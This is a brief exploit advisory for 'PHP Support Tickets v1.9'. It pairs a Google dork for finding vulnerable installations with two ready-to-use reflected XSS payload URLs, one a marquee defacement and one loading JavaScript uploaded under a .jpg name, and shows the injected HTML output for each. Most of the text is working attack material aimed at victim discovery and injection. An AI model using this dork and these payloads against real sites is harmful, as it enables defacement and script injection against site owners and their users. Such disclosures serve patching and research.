Google dork:
"PHP Support Tickets v1.9" inurl:index.php?action=

"PHP Support Tickets v1.9" by "Triangle Solutions Ltd" allows XSS attack at
index.php and some implementations also has a bad uploaded files validation
allowing to upload a js with a jpg extension that could be using for
bypassing XSS browser filters.

Demo 1 (XSS):
 url:
http://server.com/app_folder/index.php?action=Register<marquee><h1>Sys_A501%
20@%20Raza-Mexicana.org</h1></marquee>
 Code:
<!-- PHP Support Tickets Manager - Triangle Solutions Ltd /-->
<!-- END OF HEADER FILE -->

		<table width="75%" cellspacing="1" cellpadding="1"
class="boxborder" align="center">
		  <tr>
			<td class="boxborder text"
bgcolor="#AABBDD">Register<marquee><h1>Sys_A501 @
Raza-Mexicana.org</h1></marquee></td>

Demo 2 (JS as JPEG):
 url:
http://server.com/app_folder/index.php?action=Login%3Cscript%20src=./upload/
1671.jpg%3E%3C/script%3E
 Code:
<!-- PHP Support Tickets Manager - Triangle Solutions Ltd /-->
<!-- END OF HEADER FILE -->

		<table width="75%" cellspacing="1" cellpadding="1"
class="boxborder" align="center">
		  <tr>
			<td class="boxborder text"
bgcolor="#AABBDD">Login<script src=./upload/1671.jpg></script></td>


Sys_A501
sys_a501@raza-mexicana.org
sys.a501@gmail.com
www.raza-mexicana.org
http://inrootwetrust.org.mx/